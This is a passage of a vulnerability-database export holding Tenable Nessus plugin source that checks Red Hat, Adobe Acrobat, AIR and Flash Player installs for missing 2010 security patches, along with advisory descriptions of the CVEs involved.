"CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3645", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2010-11-18T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "REDHAT-RHSA-2010-0867.NASL", "href": "https://www.tenable.com/plugins/nessus/50639", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0867. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50639);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\");\n script_xref(name:\"RHSA\", value:\"2010:0867\");\n\n script_name(english:\"RHEL 6 : flash-plugin (RHSA-2010:0867)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed on the Adobe security page\nAPSB10-26, listed in the References section.\n\nMultiple security flaws were found in the way flash-plugin displayed\ncertain SWF content. An attacker could use these flaws to create a\nspecially crafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the specially crafted SWF content. (CVE-2010-3639,\nCVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643,\nCVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647,\nCVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652,\nCVE-2010-3654)\n\nAn input validation flaw was discovered in flash-plugin. Certain\nserver encodings could lead to a bypass of cross-domain policy file\nrestrictions, possibly leading to cross-domain information disclosure.\n(CVE-2010-3636)\n\nDuring testing, it was discovered that there were regressions with\nFlash Player on certain sites, such as fullscreen playback on YouTube.\nDespite these regressions, we feel these security flaws are serious\nenough to update the package with what Adobe has provided.\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.1.102.64.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3636\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3640\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3642\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3643\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3644\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3647\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3648\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3649\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3654\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb10-26.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb10-26.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0867\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0867\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-10.1.102.64-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:13:03", "description": "The version of Adobe Acrobat 9.x installed on the remote host is\nearlier than 9.4.1. Such versions are reportedly affected by multiple\nvulnerabilities :\n\n - A memory corruption vulnerability exists that could lead \n to code execution. Note that this issue does not affect\n Adobe Acrobat 8.x. (CVE-2010-3654)\n\n - An input validation issue exists that could lead to a\n bypass of cross-domain policy file restrictions with\n certain server encodings. (CVE-2010-3636)\n\n - A memory corruption vulnerability exists in the ActiveX\n component. (CVE-2010-3637)\n\n - An unspecified issue exists which could lead to a \n denial of service or potentially arbitrary code \n execution. (CVE-2010-3639)\n\n - Multiple memory corruption issues exist that could lead\n to arbitrary code execution. (CVE-2010-3640, \n CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, \n CVE-2010-3644, CVE-2010-3645, CVE-2010-3646,\n CVE-2010-3647, CVE-2010-3648, CVE-2010-3649,\n CVE-2010-3650, CVE-2010-3652)\n \n - A library-loading vulnerability could lead to code \n execution. (CVE-2010-3976)", "edition": 25, "published": "2010-11-16T00:00:00", "title": "Adobe Acrobat 9.x < 9.4.1 Multiple Vulnerabilities (APSB10-28)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "ADOBE_ACROBAT_APSB10-28.NASL", "href": "https://www.tenable.com/plugins/nessus/50613", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50613);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/09/17 21:46:53\");\n\n script_xref(name:\"Secunia\", value:\"42030\");\n\n script_name(english:\"Adobe Acrobat 9.x < 9.4.1 Multiple Vulnerabilities (APSB10-28)\");\n script_summary(english:\"Checks version of Adobe Acrobat\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3639\", \"CVE-2010-3640\",\n \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \n \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\",\n \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\", \n \"CVE-2010-3976\");\n script_bugtraq_id(44504,44838);\n\n script_set_attribute(attribute:\"synopsis\",value:\n\"The version of Adobe Acrobat on the remote Windows host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\",value:\n\"The version of Adobe Acrobat 9.x installed on the remote host is\nearlier than 9.4.1. Such versions are reportedly affected by multiple\nvulnerabilities :\n\n - A memory corruption vulnerability exists that could lead \n to code execution. Note that this issue does not affect\n Adobe Acrobat 8.x. (CVE-2010-3654)\n\n - An input validation issue exists that could lead to a\n bypass of cross-domain policy file restrictions with\n certain server encodings. (CVE-2010-3636)\n\n - A memory corruption vulnerability exists in the ActiveX\n component. (CVE-2010-3637)\n\n - An unspecified issue exists which could lead to a \n denial of service or potentially arbitrary code \n execution. (CVE-2010-3639)\n\n - Multiple memory corruption issues exist that could lead\n to arbitrary code execution. (CVE-2010-3640, \n CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, \n CVE-2010-3644, CVE-2010-3645, CVE-2010-3646,\n CVE-2010-3647, CVE-2010-3648, CVE-2010-3649,\n CVE-2010-3650, CVE-2010-3652)\n \n - A library-loading vulnerability could lead to code \n execution. (CVE-2010-3976)\");\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-28.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Acrobat 9.4.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:'Windows');\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_dependencies('adobe_acrobat_installed.nasl');\n script_require_keys('SMB/Acrobat/Version');\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Acrobat/Version\");\nversion_ui = get_kb_item('SMB/Acrobat/Version_UI');\n\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui;\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif ( \n (ver[0] == 9 && ver[1] < 4) ||\n (ver[0] == 9 && ver[1] == 4 && ver[2] < 1)\n)\n{\n if (report_verbosity > 0)\n {\n path = get_kb_item('SMB/Acrobat/Path');\n if (isnull(path)) path = 'n/a';\n\n report =\n '\\n Path : '+path+\n '\\n Installed version : '+version_report+\n '\\n Fixed version : 9.4.1\\n';\n security_hole(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_hole(get_kb_item('SMB/transport'));\n}\nelse exit(0, \"The host is not affected since Adobe Acrobat \"+version_report+\" is installed.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:13:55", "description": "The remote Windows host contains a version of Adobe AIR that is\nearlier than 2.5.1. Such versions are affected by multiple\nvulnerabilities:\n\n - An error exists in the validation of input and, with\n certain server encodings, lead to a violation of cross-\n domain policy file restrictions. (CVE-2010-3636)\n\n - An unspecified error exists which can lead to a denial\n of service. (CVE-2010-3639)\n\n - An error exists in the library loading logic and can \n lead to arbitrary code execution. (CVE-2010-3976)\n\n - There exist multiple memory corruption vulnerabilities \n which can lead to arbitrary code execution.\n (CVE-2010-3637, CVE-2010-3640, CVE-2010-3641, \n CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, \n CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, \n CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, \n CVE-2010-3652, CVE-2010-3654)", "edition": 24, "published": "2010-11-15T00:00:00", "title": "Adobe AIR < 2.5.1 Multiple Vulnerabilities (APSB10-26)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "ADOBE_AIR_APSB10-26.NASL", "href": "https://www.tenable.com/plugins/nessus/50604", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(50604);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\n \"CVE-2010-3636\",\n \"CVE-2010-3637\",\n \"CVE-2010-3639\",\n \"CVE-2010-3640\",\n \"CVE-2010-3641\",\n \"CVE-2010-3642\",\n \"CVE-2010-3643\",\n \"CVE-2010-3644\",\n \"CVE-2010-3645\",\n \"CVE-2010-3646\",\n \"CVE-2010-3647\",\n \"CVE-2010-3648\",\n \"CVE-2010-3649\",\n \"CVE-2010-3650\",\n \"CVE-2010-3652\",\n \"CVE-2010-3654\",\n \"CVE-2010-3976\"\n );\n script_bugtraq_id(\n 44504,\n 44671,\n 44675,\n 44677,\n 44678,\n 44679,\n 44680,\n 44681,\n 44682,\n 44683,\n 44684,\n 44685,\n 44686,\n 44687,\n 44690,\n 44691,\n 44692\n );\n script_xref(name:\"CERT\", value:\"298081\");\n script_xref(name:\"Secunia\", value:\"41917\");\n\n script_name(english:\"Adobe AIR < 2.5.1 Multiple Vulnerabilities (APSB10-26)\");\n script_summary(english:\"Checks version of Adobe AIR\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Windows host contains a version of Adobe AIR that is\naffected by multiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote Windows host contains a version of Adobe AIR that is\nearlier than 2.5.1. Such versions are affected by multiple\nvulnerabilities:\n\n - An error exists in the validation of input and, with\n certain server encodings, lead to a violation of cross-\n domain policy file restrictions. (CVE-2010-3636)\n\n - An unspecified error exists which can lead to a denial\n of service. (CVE-2010-3639)\n\n - An error exists in the library loading logic and can \n lead to arbitrary code execution. (CVE-2010-3976)\n\n - There exist multiple memory corruption vulnerabilities \n which can lead to arbitrary code execution.\n (CVE-2010-3637, CVE-2010-3640, CVE-2010-3641, \n CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, \n CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, \n CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, \n CVE-2010-3652, CVE-2010-3654)\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.adobe.com/support/security/bulletins/apsb10-26.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to Adobe AIR 2.5.1 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/09/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nfix = '2.5.1.17730';\nfix_ui = '2.5.1';\n\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui;\n\nif (ver_compare(ver:version, fix:fix) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + '\\n';\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n exit(0);\n}\nelse exit(0, \"The Adobe AIR \"+version_report+\" install is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T02:33:43", "description": "The remote Windows host contains a version of Adobe Flash Player 9.x\nbefore 9.0.289 or 10.x earlier than 10.1.102.64. Such versions are\npotentially affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists that could lead\n to code execution. Note that there are reports that \n this is being actively exploited in the wild. \n (CVE-2010-3654)\n\n - An input validation issue exists that could lead to a\n bypass of cross-domain policy file restrictions with\n certain server encodings. (CVE-2010-3636)\n\n - A memory corruption vulnerability exists in the ActiveX\n component. (CVE-2010-3637)\n\n - An unspecified issue exists which could lead to a \n denial of service or potentially arbitrary code \n execution. (CVE-2010-3639)\n\n - Multiple memory corruption issues exist that could lead\n to arbitrary code execution. (CVE-2010-3640, \n CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, \n CVE-2010-3644, CVE-2010-3645, CVE-2010-3646,\n CVE-2010-3647, CVE-2010-3648, CVE-2010-3649,\n CVE-2010-3650, CVE-2010-3652)\n \n - A library-loading vulnerability could lead to code \n execution. (CVE-2010-3976)", "edition": 24, "published": "2010-11-05T00:00:00", "title": "Flash Player < 9.0.289 / 10.1.102.64 Multiple Vulnerabilities (APSB10-26)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB10-26.NASL", "href": "https://www.tenable.com/plugins/nessus/50493", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(50493);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/07/11 17:09:26\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3639\", \"CVE-2010-3640\",\n \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \n \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\",\n \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\", \n \"CVE-2010-3976\");\n script_bugtraq_id(44504, 44671, 44691, 44692);\n script_xref(name:\"CERT\", value:\"298081\");\n script_xref(name:\"Secunia\", value:\"41917\");\n\n script_name(english:\"Flash Player < 9.0.289 / 10.1.102.64 Multiple Vulnerabilities (APSB10-26)\");\n script_summary(english:\"Checks version of Flash Player\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a browser plug-in that is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host contains a version of Adobe Flash Player 9.x\nbefore 9.0.289 or 10.x earlier than 10.1.102.64. Such versions are\npotentially affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists that could lead\n to code execution. Note that there are reports that \n this is being actively exploited in the wild. \n (CVE-2010-3654)\n\n - An input validation issue exists that could lead to a\n bypass of cross-domain policy file restrictions with\n certain server encodings. (CVE-2010-3636)\n\n - A memory corruption vulnerability exists in the ActiveX\n component. (CVE-2010-3637)\n\n - An unspecified issue exists which could lead to a \n denial of service or potentially arbitrary code \n execution. (CVE-2010-3639)\n\n - Multiple memory corruption issues exist that could lead\n to arbitrary code execution. (CVE-2010-3640, \n CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, \n CVE-2010-3644, CVE-2010-3645, CVE-2010-3646,\n CVE-2010-3647, CVE-2010-3648, CVE-2010-3649,\n CVE-2010-3650, CVE-2010-3652)\n \n - A library-loading vulnerability could lead to code \n execution. (CVE-2010-3976)\");\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-26.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Flash Player 10.1.102.64 / 9.0.289 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\",value:\"2010/09/10\");\n script_set_attribute(attribute:\"patch_publication_date\",value:\"2010/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/05\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nget_kb_item_or_exit('SMB/Flash_Player/installed');\n\ninfo = '';\n\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for(i=0;i<max_index(iver);i++)\n iver[i] = int(iver[i]);\n \n if (\n (\"Plugin\" >< variant || \"ActiveX\" >< variant) &&\n (\n # nb: versions before 9.0 are not affected.\n (iver[0] == 9 && iver[1] == 0 && iver[2] < 289) ||\n (\n iver[0] == 10 &&\n (\n iver[1] < 1 ||\n (\n iver[1] == 1 &&\n (\n iver[2] < 102 ||\n (iver[2] == 102 && iver[3] < 64)\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == 